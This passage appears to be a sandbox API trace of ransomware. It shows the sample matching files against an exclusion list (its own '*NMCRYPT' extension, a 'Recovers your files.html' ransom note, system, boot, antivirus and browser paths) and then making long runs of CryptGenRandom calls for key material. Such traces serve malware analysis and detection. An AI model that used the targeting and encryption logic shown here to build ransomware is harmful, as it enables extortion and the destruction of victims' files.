shared\\ink\\he-IL\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad7f8 [0159.087] wcscmp (_String1=".", _String2=".") returned 0 [0159.087] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.087] wcscmp (_String1="..", _String2=".") returned 1 [0159.087] wcscmp (_String1="..", _String2="..") returned 0 [0159.087] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0159.087] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0159.088] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0159.088] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0159.088] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0159.088] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0159.088] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0159.088] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui", pszSpec="*") returned 1 [0159.088] strlen (_Str="NMoreira") returned 0x8 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.088] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.089] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.090] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.091] CryptGenRandom (in: 